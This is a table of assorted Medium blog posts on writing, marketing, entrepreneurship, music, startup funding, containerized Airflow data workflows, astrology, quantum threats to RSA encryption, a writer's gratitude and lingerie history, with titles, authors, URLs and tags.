title | text | url | authors | timestamp | tags
---|---|---|---|---|---|
How to write, I mean, how I can tell myself to write
|
Write oh write.
How to write?
Can we start with the generic question? Don’t worry, you can always answer in whatever style you like, meaning you can play top-down or bottom-up.
Well, technically speaking, you just need to open up your laptop and open any app that lets you type (that’s for writing with a computer).
If you prefer to write by hand, you can use paper or any medium that can take handwriting. And of course, you need that pencil or pen. You get the idea.
Then you see that blank page of paper, or that blank screen. And if you want to write, you can put down any word, which will form a sentence, which will form a paragraph on that blank page.
As you go on writing, you can watch the page slowly fill with words that are actually deeper than merely words.
They may carry ideas, messages, thoughts, feelings, things that might not exist without you writing them down.
And thanks to you, you bring those into existence.
Because you write it down.
|
https://medium.com/@1percent-progress/how-to-write-i-mean-how-i-can-tell-myself-to-write-927c94b91981
|
['Sandro Sirait']
|
2020-12-26 00:12:31.583000+00:00
|
['Thinking', 'Questions', 'Writing']
|
About Felicia C. Sullivan
|
The Details: It’s About Experience…And Being Human
A data-driven marketer and storyteller for over two decades, who has straddled the agency and client-side fences, I deliver simple solutions to complex problems. I care about customer lifetime value over campaign ROI.
My 3-step brand-building method — where your customers are the hero of the story — sets me apart from the pack. Customers aren’t a line item on a P&L — they’re discerning and overwhelmed by choice. We live in an era where problem-solving isn’t enough. Values are no longer a tagline.
Being decent is not a campaign.
I help businesses build better brands for customers that demand we be better humans.
My experience has cultivated an enviable reputation for delivering the wow factor, backed by a sound brand and storytelling strategy that drives long-term business results.
I’ve been telling stories since I was six and I haven’t shut up since.
TL;DR: I make marketing simple.
|
https://medium.com/@felsull/about-felicia-c-sullivan-1c2bc76f0e28
|
['Felicia C. Sullivan']
|
2021-03-25 00:59:39.987000+00:00
|
['Felicia C Sullivan', 'Marketing', 'About Me', 'Freelancing']
|
Entrepreneurship can’t be taught
|
Business skills can be taught; entrepreneurial qualities like grit and risk tolerance are inborn.
So can entrepreneurship be taught? Most entrepreneurs and investors seem to think the answer is ‘no’. Most academicians and students think the answer is ‘yes’. — Amity University
I sincerely believe that exceptional entrepreneurs have what it takes in them from the day they were born, and I think most psychologists will agree with me. We’re talking about the unicorns; the ones that make it to a respectable IPO. Why? Let me explain with a simple but intuitive analogy.
Entrepreneurs are born, not bred
How does one cultivate a great, world-class musician, say a pianist? First you gather all the young kids who can play the instrument. You then ask respected piano teachers to evaluate who has the innate talent and aptitude to go far. And then you get these teachers to take them under their wings and put them through years of rigorous training and dedication to the craft.
You do not, however, make playing the piano seem cool and glamorous to attract general interest from all children, get a bunch of people who have never played the piano to evaluate them, and then choose a large number as apprentices and hope that eventually a few of them will achieve greatness.
The same could be said of any other achievements that require a lot of talent, determination and passion to succeed. I believe being a successful entrepreneur falls into such a category, having failed miserably in one attempt, achieved minor success in another, and met and talked with many who fell into both ends of the spectrum.
Encouraging entrepreneurial ‘spirit’
Some governments or academic institutions believe that encouraging entrepreneurial spirit is the key to creating more successful entrepreneurs. I believe that is a mistake. Getting more people to try does not increase the odds of getting successful startups.
The Oxford Dictionary defines ‘spirit’ as “the prevailing or typical quality, mood or attitude of a person, group or period of time”. By this very definition it implies that any ‘spirit’ is temporary in nature.
Rather than developing an overall sense of ‘entrepreneurial spirit’, it might be better to identify individuals with inherently strong entrepreneurial qualities that will last (passion, grit, resourcefulness, risk-taking aptitude) and give them the encouragement and assistance they need to fully develop their potential over the long and obstacle-laden process they will surely face.
It’s cool to do a startup
With big money and so much glamour propaganda injected into entrepreneurship these days, I have met many young founders doing startups because it is now ‘cooler’ and less boring than working in a big corporation. They also tend to choose popular themes such as Artificial Intelligence or Blockchain because it’s easier to get investors’ attention. They quote Jack Ma or Steve Jobs as role models and use popular lingo like solving “pain points” that venture capitalists love to hear in pitches.
|
https://lancengym.medium.com/entrepreneurship-cant-be-taught-980380d2423d
|
['Lance Ng']
|
2018-11-21 01:13:14.664000+00:00
|
['Startup Lessons', 'Startup', 'Entrepreneurship', 'Entrepreneur', 'Founders']
|
no. 7 — Midnight Matinee by Brass Bed
|
If you read the earlier posts (no worries if you didn’t), you’d know that my mom used to run an online music magazine and got hundreds of unsolicited CD submissions mailed to our house every month. Once the shelves in her office were full, the CDs piled onto the living room shelves. Then they stood in stacks on the office floor. Finally, they filled huge plastic bins that we kept in the basement. Even after my mom no longer ran the magazine, bands would send CDs and EPs and singles, hoping to be reviewed by my mom and her team of writers.
When my friends and I were really bored, or when I was tired of listening to the same three albums over and over, we’d go down into the office or the basement and rummage through the CDs, hoping to find something good. A lot of the time, whenever we slid the CD into the DVD player and blasted it over the TV speakers, the music was not great. But every now and then, we’d find gems.
Brass Bed was the first band I found out of those piles that I loved. It really felt like finding a needle in a haystack. I loved them a little extra because they were a band my mom didn’t know; I found them before she did, which made them more special. When your mom is a music expert, you gotta find your niche somewhere. I found that niche in the pop guitar, horns, and unexpected doo-wop, almost country-like harmonies that back what is ultimately an indie-rock band. At the time, this album was only a few years old, and searching their band name on Google yielded almost no results. Now, though, they have multiple albums out, a Tiny Desk concert, and enough fame to be found on all major streaming platforms. However, they still feel like my little secret.
I’m not sure what it is that makes Brass Bed feel different from other bands. Maybe someone who understands music theory can tell me, but when their song Olivia comes on shuffle while I’m driving around, I still lose my damn mind. If you listen to any song on this album, listen to Olivia. Some songs are for rainy days, some for sunny days, some for winter and some for summer. This song is for anything and everything. It is perfect for all weather. Any time I’m in an ok mood, this song cheers me up. Any time I’m in a good mood, this song matches it. Maybe it’s the horns, or the way the song stops right when it reaches its groove and grows in a new crescendo. Or maybe it’s just rad. If you listen, let me know what you think.
You can listen here
|
https://medium.com/@jennasylvester/no-7-midnight-matinee-by-brass-bed-25e394bd200e
|
['Jenna Sylvester']
|
2020-11-24 03:37:54.804000+00:00
|
['Album Review', 'Nonbinary', 'Music', 'Brass Bed', 'Personal Essay']
|
Black founders can pitch for a $100,000 investment
|
Panel discussion during Capital Factory’s 2019 Black in Tech Summit
On February 16th, during Capital Factory’s Black in Tech Summit, five technology startup finalists will be judged by a panel of successful entrepreneurs, industry leaders and mentors. One startup will walk away with a $100,000 investment that day!
Who can apply?
Any tech or consumer startup with a black founder can apply to pitch at our Black in Tech Summit.
The best opportunity and pitch will receive:
Admission to Capital Factory’s VIP Accelerator
$100,000 cash investment on a SAFE or Convertible Note using Capital Factory’s term sheet and your most recent funding valuation
Access to the Capital Factory Mentor network
Up to $250,000 in potential total hosting credits from AWS, Google Cloud, Microsoft Azure and other major hosting providers (each individual offer is different and subject to change)
Featured on an episode of Capital Factory’s Austinpreneur podcast
Think you’ve got a shot at $100,000? Apply now to be one of five teams selected to pitch. You could walk away with $100,000 and a new home at the Center of Gravity for Entrepreneurs in Texas! Application deadline is January 22.
Want a chance to pitch? Submit your application
Who has won Capital Factory’s Black in Tech Investments before?
Winners include thriving Texas startups like Dallas-based ShearShare, Houston-based GroupRaise, and Austin-based Journey Foods. We’ve helped winners connect with customers, mentors, and secure capital from Google, Revolution’s Rise of the Rest Fund, Backstage Capital, and many other VC investors.
Dallas’ ShearShare runs a marketplace connecting stylists with available seats at salons and has raised $2.3 million in funding.
Houston’s GroupRaise is a marketplace that helps groups of 20–200 people make reservations at restaurants willing to donate a percentage of the sales back to a charitable cause.
Austin’s Journey Foods uses AI to create sustainable recipes for food manufacturers.
|
https://austinstartups.com/black-founders-can-pitch-for-a-100-000-investment-c72393ef20fe
|
['Capital Factory']
|
2020-12-18 01:28:16.577000+00:00
|
['Fundraising', 'Austin', 'News', 'Startup', 'Pitching']
|
Containerizing Data Workflows
|
(And How to Have the Best of Both Worlds)
By Tian Xie
As a data technology company, Enigma moves around a lot of data, and one of our main differentiators is linking nodes of seemingly unrelated public data together into a cohesive graph. For example, we might link a corporate registration to a government contract, an OSHA violation, a building violation, etc. This means we not only work with lots of data, but lots of different data, where each dataset is a unique snowflake slightly different from the next.
Wrangling high quantities and varieties of data requires the right tools, and we’ve found the best results with Airflow and Docker. In this post, I’ll explain how we’re using these, a few of the problems we’ve run into, and how we came up with Yoshi, our handy workaround tool.
If you work in data technologies, you’ve probably heard of Airflow and Docker, but for those of you who need a quick introduction…
Introducing Airflow
Airflow is designed to simplify running a graph of dependent tasks. Suppose we have a process where:
There exist five tasks: A, B, C, D, and E, and all need to complete successfully.
B, C and E depend on the successful completion of A.
D depends on the successful completion of B and C.
Considering each task as a node and each dependency as an edge forms a directed acyclic graph — or DAG for short.
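The five-task example above can be sketched in plain Python. This is an illustration of the dependency graph itself, not Airflow code:

```python
# Each task maps to the set of tasks it depends on (the edges of the DAG).
dag = {
    "A": set(),
    "B": {"A"},
    "C": {"A"},
    "D": {"B", "C"},
    "E": {"A"},
}

def topological_order(graph):
    """Return a valid execution order: every task runs after its dependencies."""
    order, done = [], set()
    while len(done) < len(graph):
        # A task is ready once all of its dependencies have completed.
        ready = [t for t, deps in graph.items() if t not in done and deps <= done]
        if not ready:
            raise ValueError("cycle detected - not a DAG")
        for task in sorted(ready):
            order.append(task)
            done.add(task)
    return order

print(topological_order(dag))  # A runs first; D runs only after B and C
```

This is exactly the ordering guarantee Airflow provides, plus all the operational machinery around it.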
If you are familiar with DAGs (or just looked them up in “Cracking the Coding Interview”), you might think that if a DAG can be reasoned about within the time of a job interview, it can’t be that complex, right? In production, these systems are much more complex than a single topological sort. Questions such as “how are DAGs started?”, “how is the state of each DAG saved?”, and “how is the next node started?” are answered by Airflow, which has led to its widespread adoption.
Scaling Airflow
In order to understand how Docker is used, it’s important to first understand how Airflow scales. The simplest implementation of Airflow could live on a single machine where:
DAGs are expressed as Python files stored on the file system.
State is written to a SQLite database.
A webserver process serves a web admin interface.
A scheduler process forks tasks (the nodes in the DAG) as separate worker processes.
Unfortunately, this system can only scale to the size of the machine. Eventually, as DAGs are added and more throughput is needed, the demands on the system will exceed the machine’s capacity. In this case, Airflow can expand into a distributed system:
The Airflow webserver and scheduler continue running on the same master instance where DAG files are stored.
The scheduler connects to a database running on another machine to save state.
The scheduler connects to Redis and uses Celery to dispatch work to worker instances running on many worker machines.
Each worker machine can also run multiple Airflow worker processes.
Now this system can scale to as many machines as you can afford,* solving the scaling problem! Unfortunately, switching to a distributed system generally buys scalability at the price of infrastructural complexity, and that’s certainly the case here. Whereas it is easy to deploy code to one machine, it becomes dramatically harder to deploy to many machines, since the number of configuration permutations that can go wrong multiplies with each one.
If a distributed system is necessary, then it’s very likely that not only is the number of workers very high, but also the number of DAGs. A large variety of DAGs means a large variety of different sets of dependencies. Over time, updating every DAG to the latest version will become unmanageable and dependencies will diverge. There are systems for managing dependencies in your language of choice (e.g. virtualenv, rubygems, etc) and even systems for managing multiple versions of that language (e.g. pyenv, rbenv), but what if the dependency is at an even lower level? What if it depends on a different operating system?
Containerizing Workflows
Docker to the rescue!
Unless you have been living in a container (ha-ha) for the last five years, you’ve probably heard of containers. Docker is a system for building light-weight virtual machines (“images”) and running processes inside those virtual machines (“containers”). It solves both of these problems by keeping dependencies in distinct containers and moving dependency installation from a deploy process into the build process for each image.
When the code for a DAG (henceforth, this set of code will be referred to as a “workflow”) is pushed to our remote git host and CI/CD system, it triggers a process to build an image. The image is built with all of the dependencies for the workflow and pushed to a remote Docker repository, making it accessible via URL. At the same time, the Airflow Python DAG file is written. Rather than executing the workflow code directly, the DAG specifies a command to execute in the Docker image. At run-time, Airflow executes the DAG, thereby running a container for that image. This pulls the image from the Docker repository, and with it the workflow’s dependencies.
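In outline, a DAG node doesn’t run workflow code directly; it shells out to Docker. A minimal sketch of that idea follows (the image URL and task command are made up for illustration; the real setup would use Airflow operators rather than building the command by hand):

```python
import shlex

# Hypothetical image URL pushed by CI/CD for one workflow.
IMAGE_URL = "registry.example.com/workflows/my-workflow:abc123"

def docker_command(image, task_cmd):
    """Build the `docker run` invocation a DAG node would execute.

    Pulling the image at run-time also pulls the workflow's frozen
    dependencies, so the worker machine needs nothing pre-installed.
    """
    return ["docker", "run", "--rm", image] + shlex.split(task_cmd)

cmd = docker_command(IMAGE_URL, "python -m workflow.tasks.extract")
print(" ".join(cmd))
```

The worker only ever needs Docker itself; everything else travels inside the image.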
Docker is not a perfect technology. It easily leads to docker-in-docker inception-holes and much has been written about its flaws, but nodes in a DAG are an ideal use-case. They are effectively enormous idempotent functions — code with input, output and no side-effects. They do not save state nor maintain long-lived connections to other services — two of the more frequently cited problems with Docker.
A Double-Edged Sword?
Docker exchanges loading dependencies at run-time for loading dependencies at build time. Once an image has been built, the dependencies are frozen. This is necessary to separate dependencies, but becomes an obstacle when multiple DAGs share the same dependency. When the same library upgrade needs to get delivered to multiple images, the only solution is to rebuild each image. Though it may sound far-fetched, this situation comes up all the time:
A change to an external API requires an update in all client applications.
A security flaw in a deeply nested dependency needs a patch.
DRY (“Don’t Repeat Yourself”) is one of the central tenets of good software development, and it naturally leads to shared libraries.
Code Injection
The double-edged sword endemic to Docker containers should sound familiar to anyone working with static builds. One common approach to solving this problem is to use plug-ins loaded at run-time. At Enigma, we developed a similar approach for Docker containers that we named Yoshi (hence, the Nintendo theme for this entire blog post).
As previously noted, when a workflow is pushed to our remote git repository and CI/CD system, it triggers an automated process to build an image for that workflow including installing all of its dependencies. Yoshi is a python package that is included as one of these dependencies and gets frozen on the image. Since different workflows change at different rates, they go through the build process at different times and wind up with different versions. This is the nature of working with docker images. Yoshi is also directly installed onto the machine where the airflow worker runs. The latest version is always installed on these machines. At runtime, when the airflow worker executes the docker command, it mounts its local install of Yoshi onto the docker container. This injects the latest Yoshi code into that container, thereby updating Yoshi in the container to the latest version.
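The mount step can be sketched as the extra `-v` flag the worker adds when it launches a container (the paths and image URL here are hypothetical, chosen only to show the shape of the mechanism):

```python
# Hypothetical paths: where Yoshi lives on the worker host, and where the
# frozen copy lives inside the image.
HOST_YOSHI = "/opt/airflow/site-packages/yoshi"
CONTAINER_YOSHI = "/usr/local/lib/python3.8/site-packages/yoshi"

def run_with_injection(image, command):
    """Mount the worker's (always-latest) Yoshi over the image's frozen copy."""
    mount = f"{HOST_YOSHI}:{CONTAINER_YOSHI}:ro"
    return ["docker", "run", "--rm", "-v", mount, image] + command

cmd = run_with_injection("registry.example.com/workflows/my-workflow:abc123",
                         ["python", "-m", "workflow.main"])
```

Because the bind mount shadows the directory baked into the image, the container sees the host’s Yoshi version, whatever version was frozen at build time.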
By keeping code we suspected might need to be updated frequently in Yoshi, keeping the interface to Yoshi stable and injecting the latest code at run-time, we are able to update code instantly across all workflows.
The Best of Both Worlds?
Injecting code at run-time allowed us to use all of the benefits of Docker containers, but also create exceptions when we needed. At first, this seemed like the best of both worlds, but over time we ran into flaws:
A stable interface and backwards compatibility are absolutely essential for allowing newer versions of a library to overwrite an older version, but that’s easier said than done. Maintaining compatibility across hundreds of workflows with different edge cases is even more challenging. Coming from working with containerized processes also required forming some new habits. No code is one-hundred-percent bug-free, but this led to many more bugs than we anticipated.
The most frequent use-case for Yoshi was for clients to access external resources. When external resources changed, Yoshi changed with them, which meant that older versions no longer worked. An image is expected to work forever, but the absence of the latest version of Yoshi broke that expectation.
Did I say that the most frequent use-case for Yoshi was for clients to access external resources? Turns out that was the only use-case. Initially, we expected to use Yoshi in many different ways, but wound up using it in the same place every time. This meant Yoshi was much larger and more complex than necessary, and we only needed it in one node of the DAG.
Yoshi caused more bugs and complexity than we wanted, but by revealing where our code changed most frequently, it also revealed a simpler way to deploy updates across many DAGs.
Image Injection
Heretofore, images were built one-to-one for each DAG, but it does not have to be that way. Each workflow has its own set of dependencies, so an image is built for those dependencies, but each node in the DAG could use a different image. Additionally, Docker images are referenced by URL, and the image stored at that URL can change without the URL changing. This means that a DAG node referencing the same image URL can, over different runs, execute different images.
Eventually, this led us to inject code by inserting updated images in the middle of a DAG.
The Yoshi library remained the same, with all of the same functionality, except now it was also packaged and executable from its own Docker image. Workflows were changed so that individual DAG nodes could use different image URLs. Nodes where our code interacted with external resources now used the Yoshi image instead of the workflow image. The URL for the Yoshi image was resolved at run-time with environment variables from the machine, so that different environments could use different URLs: staging could use an image tagged as staging, and the same for production. When changes to the Yoshi library were pushed to our remote git repository, our CI/CD system built a new image and pushed it to the Docker repository at those URLs. At run-time, the workflow pulls the latest Yoshi image.
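Resolving the image URL from the environment might look like this (the variable name and registry are illustrative, not Enigma’s actual configuration):

```python
import os

def yoshi_image_url(default_tag="staging"):
    """Pick the Yoshi image for this environment.

    Staging and production machines run the same DAG code but point at
    differently tagged images via an environment variable.
    """
    tag = os.environ.get("YOSHI_IMAGE_TAG", default_tag)
    return f"registry.example.com/yoshi:{tag}"

os.environ["YOSHI_IMAGE_TAG"] = "production"
print(yoshi_image_url())
```

Since CI/CD re-pushes the image at the same tagged URL, every run automatically picks up the latest Yoshi without rebuilding any workflow image.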
Image injection not only allowed us to build workarounds to the double-edged sword of static Docker images — without the compatibility challenges of code injection — but building a Yoshi image also opened new doors to run Yoshi utilities from a command-line anywhere and run a Yoshi service.
It took us a long time to get there, but our final solution allowed us to have the best of both worlds, and then some.
Game Over.
*There is a limit to the number of machines that can connect to the same Redis host, but you will almost certainly hit other limits first, especially as a start-up.
|
https://medium.com/enigma-engineering/containerizing-data-workflows-95df1d338048
|
[]
|
2019-04-12 17:32:29.857000+00:00
|
['Airflow', 'Docker', 'Data Engineering', 'Gitlab', 'Engineering']
|
Simplify And Streamline
|
Desk Photo by Ylanite Koppens from Pexels
DAILY ASTRO
Friday, July 2, 2021
Sun in Cancer 10° 55′
Last Quarter Waning Moon in Aries, VOC 4:14am July 3–12:27pm July 3 UTC
Prominent Planets: Mars
Prominent Mode: Mutable
Prominent Element: Fire
Prominent Aspect: Sextile
Retrogrades: Jupiter Rx, Saturn Rx, Neptune Rx, Pluto Rx, Juno Rx
Fixed T-Square
Grand Fire Trine
Mars square Uranus (Exact on Sunday)
Saturn Rx sextile Chiron
It’s a great day to change something so actions are more efficient in order to reduce stress and enjoy life. Where are you scattering your energy? Open, honest communication works best today, if you have the courage.
Mars in Leo continues its standoff in a Fixed T-square with Saturn Rx and Uranus with Venus trying to join the party. Meanwhile, the waning Moon in Aries sextiles Mercury and squares Pluto Rx today.
Anxiety or pressure may be coming from the tension of trying to drive fast with the brakes on. Thoughts, words, actions, AND emotions may all be racing, and yet nothing seems to really go anywhere… at least not as fast as you would like.
With Saturn in its domicile, usually it would be best to stick to the usual routine. But Saturn is retrograde and Mars and Uranus need something to change.
Facing an issue DIRECTLY and doing something DIFFERENT this time is highly rewarded.
Facing a concern head on is not for the faint of heart, and yet you’ll find it wasn’t as big of a problem as you thought. In fact, you can even use the issue to make your life easier, more relaxed, beautiful, or enjoyable. What honestly feels BEST to you? You can go ahead and do THAT.
RELATIONSHIPS: Some people may need lots of space and no pressure before they feel safe to come out of their shell or open up in vulnerability. Some may feel defensive, or there may be conflict if someone feels constricted. Allowing individuals to be themselves constitutes harmony. People learn best through their own choices and experiences.
Follow the Daily Astrology Forecast at intuitivefish.com for conscious awareness and practical life guidance.
|
https://medium.com/@intuitivefish/simplify-and-streamline-454ba814e7fc
|
['Intuitive Fish']
|
2021-07-02 16:45:45.397000+00:00
|
['Zodiac', 'Astrology', 'Efficiency', 'Dailyastrology', 'Astrologyupdates']
|
What is a Bond?
|
A bond is a type of loan: the issuer, usually a government, municipality, or corporation, borrows money from investors with the agreement to pay it back at the end of the term, with interest along the way. If you are looking to buy a bond, you will need to know the bond market and what each bond means. It is very important to understand what the purpose of a bond is and how it is classified in the market.
Understanding the bond market is also important for people who are interested in purchasing bonds so that they can pick the bonds they need for their investments and portfolios.
A bond serves two primary functions: it raises capital for the issuer, and it pays regular interest, called the coupon, to the bondholder. There are different types of bonds: federal, state, municipal, corporate, agency, and mortgage-backed securities. The face value of the bond is the amount of money you will receive at maturity. The maturity is the time period between when you purchase a bond and when the principal is repaid.
Most people purchase bonds as a safe-haven investment. Some bonds also carry tax advantages; municipal bond interest, for example, is often tax-exempt. Federal bonds are those that are guaranteed by the U.S. Government. State and municipal bonds are issued by local governments. Corporate bonds commonly carry a face value of $1,000, though this varies. The yield to maturity depends on the price you pay relative to that face value and the coupons you collect along the way.
What is a Bond in Stocks?
For people who are planning to start investing in stocks or bonds, it helps to understand bond investing and how to calculate bond yield. A bond may be secured by collateral or unsecured (an unsecured bond is called a debenture). The word “bond” refers to the binding obligation between issuer and investor. Bond investing, then, is the buying and selling of bonds for profit or loss.
To calculate bond yield, one has to understand the yield curve, which plots the yields of comparable bonds against their time to maturity. Reading the curve shows how much extra return a longer commitment earns, which helps an investor choose a maturity.
For people who are comfortable with the concepts of bond investing, it is better to work through the numbers directly. These calculations tell an investor the interest the bond pays (the coupon rate) and the overall rate of return (the yield).
There are many other methods of calculating yield such as the amortization schedule method, breakeven analysis, and historical yields. Before investing in stocks, bonds, or both, it is always wise to compare prices of different companies so that one can have an idea of the profit margin.
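To make the price/yield relationship concrete, here is a small present-value sketch. The 5-year, 5%-coupon bond below is a made-up example, not one from the article:

```python
def bond_price(face, coupon_rate, yield_rate, years):
    """Price = discounted annual coupons + discounted face value at maturity."""
    coupon = face * coupon_rate
    coupons = sum(coupon / (1 + yield_rate) ** t for t in range(1, years + 1))
    principal = face / (1 + yield_rate) ** years
    return coupons + principal

# A bond priced at a yield equal to its coupon rate trades at par (face value).
par = bond_price(1000, 0.05, 0.05, 5)
# When market yields rise above the coupon, the price falls below face value.
discounted = bond_price(1000, 0.05, 0.07, 5)
```

Running the two cases shows the core inverse relationship: as the required yield rises, the price of an existing bond falls, and vice versa.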
|
https://medium.com/@joliver02051991/what-is-a-bond-a2d988045a60
|
[]
|
2020-12-18 07:54:37.105000+00:00
|
['Bonds', 'Bond Yield', 'Stocks', 'Loans', 'Investment']
|
Modern Cryptography is Doomed.
|
Quantum computing is set to destroy cryptography as we know it.
Image Creds: Quanta Magazine
Everything from files on our hard drives to confidential Internet traffic is encrypted by the same system. The system makes up the base of modern cryptography.
This system is called RSA cryptography. (It’s doomed, but we’ll get there).
We could talk about the nitty-gritty of the system for a while but the basic point is that it generates keys by multiplying really big prime numbers.
It might sound too simple to be true. Our world’s most secure messages are guarded by multiplication?! But it’s actually a really smart idea.
To hack RSA cryptography, you’d have to find the prime factors of the generated keys. While any computer can multiply two really big prime numbers, almost no computer can recover the prime factors from the product. The computer would have to sit there and run through every possibility. It would never get the job done, at least not in under a trillion years.
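A toy RSA round-trip with deliberately tiny primes shows why factoring is the whole game. These values are purely illustrative; real keys use primes hundreds of digits long:

```python
from math import gcd

# Two small primes - trivially factorable, unlike real 2048-bit RSA moduli.
p, q = 61, 53
n = p * q                  # public modulus: 3233
phi = (p - 1) * (q - 1)    # Euler's totient: 3120
e = 17                     # public exponent
assert gcd(e, phi) == 1    # e must be invertible mod phi
d = pow(e, -1, phi)        # private exponent: e * d == 1 (mod phi)

message = 42
ciphertext = pow(message, e, n)   # encrypt with the public key (e, n)
decrypted = pow(ciphertext, d, n) # decrypt with the private key (d, n)

# An attacker who factors n back into p and q can recompute phi, and
# therefore d - which is exactly what the trillion-year search prevents.
```

With p and q this small, any laptop factors n instantly; the entire security of RSA is the gap between multiplying the primes and recovering them.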
Wait. I said almost no computer can break RSA. That’s because a new field of computers is emerging. These computers possess the power to rattle RSA cryptography’s spine.
These are quantum computers.
Quantum computers are weird. They have a bunch of really crazy properties that I talk about here. They’re able to perform operations on qubits in superposition, which lets them cut the time complexity of certain problems exponentially: a task that would take a classical computer on the order of 2^3,500,000 steps collapses into a polynomial number of steps.
That means that instead of aimlessly searching possibilities to hack RSA, a quantum computer could factor the key in a feasible amount of time.
Yeah, when quantum computers come, RSA’s done for.
RSA on the run
Let’s break this down more though.
Shor’s Algorithm
In 1994, the mathematician Peter Shor wrote an algorithm. At the time, quantum computing was entirely theoretical. Nobody wanted to build a quantum computer because there was no apparent purpose. This algorithm changed that.
Shor’s algorithm showed that a properly functioning quantum computer could solve problems that classical computers never could. It kicked off the race to build a quantum computer.
The algorithm is a 3-part answer to the problem of prime factorization. The first part is performed on a classical computer in polynomial time, but it is only the set-up for the second and most important part. The second part requires the use of specially constructed quantum circuits to perform the quantum computation needed to find the value you need for the third part, which allows you to find the prime factors of the integer on a classical computer.¹
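The classical bookends of the algorithm can be sketched in plain Python. Here the quantum order-finding step (part two) is faked with brute force, which only works for toy numbers like 15 or 21 and is exactly the part a quantum computer accelerates:

```python
from math import gcd

def order(a, n):
    """Brute-force the order r of a mod n: the smallest r with a^r = 1 (mod n).
    This is the step Shor's quantum circuit performs exponentially faster."""
    r = 1
    while pow(a, r, n) != 1:
        r += 1
    return r

def shor_classical(n, a):
    """Classical pre- and post-processing of Shor's algorithm for one guess a."""
    g = gcd(a, n)
    if g > 1:                # lucky guess: a already shares a factor with n
        return g, n // g
    r = order(a, n)          # <-- quantum step, faked here
    if r % 2 == 1:
        return None          # odd order: retry with another a
    x = pow(a, r // 2, n)
    if x == n - 1:
        return None          # a^(r/2) = -1 (mod n): retry with another a
    return gcd(x - 1, n), gcd(x + 1, n)

print(shor_classical(15, 7))  # recovers the factors of 15
```

Everything outside `order` runs in polynomial time on a classical machine, which is why only the order-finding step needs quantum hardware.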
It’s a Future Thing.
Sadly, the algorithm is here but the computers aren’t. Even when Peter Shor came up with it in 1994, he knew it would take an advanced quantum computer to break RSA cryptography.
Luckily (or unluckily), we’re not too far away from developing quantum computers that can break RSA. Most people think that it’ll happen in around a decade.
The best part is that even though RSA cryptography is screwed, we’re not. Cryptographers have already begun research into Post-Quantum Cryptography to make sure we’re able to keep everything secure after quantum arrives.
Here’s What I Did.
I wanted to see Shor’s Algorithm in action. So I made it happen.
There are tons of ways online for people to gain access to quantum simulators and code quantum algorithms. I thought it’d be pretty cool to code Shor’s algorithm and run it on a real simulator at IBM.
Here’s a little snippet of my code
I coded Shor’s algorithm on Qiskit Aqua and ran it on IBM’s simulators. The process wasn’t too bad because there’s a ton of open-source code out there for similar algorithms.
My results weren’t perfect. But it’s only a simulator after all. It didn’t always end up working and completely stopped when the numbers got too high.
But that’s ok. This is only a glimpse of what a true quantum computer can do. We’re just hanging on until the real ones show up.
|
https://medium.com/@anishamusti/modern-cryptography-is-doomed-8256f1ef465a
|
['Anisha Musti']
|
2019-12-01 17:00:00.419000+00:00
|
['Quantum Computing', 'Rsa Encryption', 'Quantum Cryptography', 'Post Quantum Cryptography', 'Quantum']
|
經典網路系列(11) — DCGAN
|
gitE0Z9/classical-network-series
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build…
|
https://medium.com/@acrocanthosaurus627/%E7%B6%93%E5%85%B8%E7%B6%B2%E8%B7%AF%E7%B3%BB%E5%88%97-11-dcgan-40a78e279030
|
['Mz Bai']
|
2020-12-13 12:35:12.218000+00:00
|
['Gan', 'Deep Learning', 'Pytorch']
|
A Medium Writer Sent My Family a Box Full of Rainbows and Unicorns
|
My daughter and I received a package in the mail yesterday from my writer friend Shannon Ashley, wrapped up with sparkly pink duct tape.
I looked inside and immediately started to cry.
You see, I’m in a bunch of Facebook groups for Medium writers. In one of the smaller groups, writer Kyrie Gray leads a weekly Rant Thread, where for 24 hours we can rant all we want — about work or anything else.
Every week, people pour out their hearts, and every week, other Medium writers reply to the rants with kindness, empathy, and understanding.
This alone is heartwarming, but this week, things got next-level for me.
The Rant Thread came at a good time. I haven’t had a super-viral article in a while, and I was feeling overwhelmed and afraid I wouldn’t be able to keep building on my writing successes. And as I wrote my rant, I arrived at the root of it all: money. Money worries underscore all the other worries.
I commented that, since my kid started kindergarten, she’s somehow ripped holes in the knees of every pair of her size 4T pants. The weather’s getting colder, and I was sending my child to school in pants with holes in them. I was ready to prioritize getting her new pants, but in the meantime, I really needed to rant, to cry about how sick I am of working so hard and still being low-income.
Shannon, with her heart of gold, got my address over PM, and it was only a couple days later we received her package full of unicorns and rainbows.
Shannon’s daughter’s the same age as mine, so I expected a box of hand-me-downs — which would’ve been incredible on its own — but it was clear Shannon and her daughter specifically chose some things just for my daughter.
I felt her kindness and her friendship in the thoughtful items in this box: a rainbow hair bow and unicorn dress my daughter received just in time for School Picture Day; a Snoopy book about being “brave and kind,” the very words my daughter’s teacher used for her when she named her Star Student of the Week in kindergarten.
Shannon’s daughter made my daughter a drawing of flowers and smiling butterflies. I can’t wait for my daughter to mail some art back.
The amazing package we received! (Photo credit: Author)
And Shannon even included a gift card, with a note that it was for me to use on myself. She’s written about how difficult it is as a mom to prioritize yourself, and I feel this so much. I used part of the gift card immediately, and bought myself new underwear for the first time since my daughter was 1. I also treated myself to a little milk steamer so I can make soy lattes at home.
Too often I hear Conservative talking points about how “handouts” will make people lazy. Honestly, I was just the recipient of a whole lot of generosity, and right now, I feel the opposite of lazy.
I feel inspired. I feel grateful. Dare I say it, I feel #blessed!
I want to believe that I deserve nice stuff. And more than anything, I want to pay it forward.
Regardless of how much money we make or don’t make, we can find ways to give to others. And when we make more money, that can be an opportunity to find even more ways to be generous.
“Our friends are so generous,” I gushed. “I want to be generous like that too.”
“Me too!” my daughter said. “I want to be generous like that too!”
|
https://medium.com/warm-hearts/a-medium-writer-sent-my-family-a-box-full-of-rainbows-and-unicorns-1d6da7721539
|
['Darcy Reeder']
|
2019-10-09 23:27:26.612000+00:00
|
['Life Lessons', 'Writing', 'Kindness', 'Gratitude', 'Empathy']
|
How Lingerie Empowers Women to Embrace Their Sexuality
|
Photo by Melnychuk Nataliya on Unsplash
From the iconic French label, Eres to high street brands Boux Avenue and Ann Summers, the connotations associated with women’s undergarments are fascinating. Feminism and lingerie have always had a rocky relationship, as historically, women’s undergarments have been utilised both as a means of expression and repression. The trend in the last 50 years has moved away from protecting chastity towards pushing for more liberated ideas about women’s rights to express their sexuality. Think of Madonna’s iconic Gaultier corset during her 1980s Blonde Ambition Tour which paved the way for new interpretations of traditional undergarments in the following decades. However, the lingerie industry is still looked down on by some due to its reputation for pandering to a supposed male fantasy.
Tyra Banks at the 2005 Victoria’s Secret Fashion Show
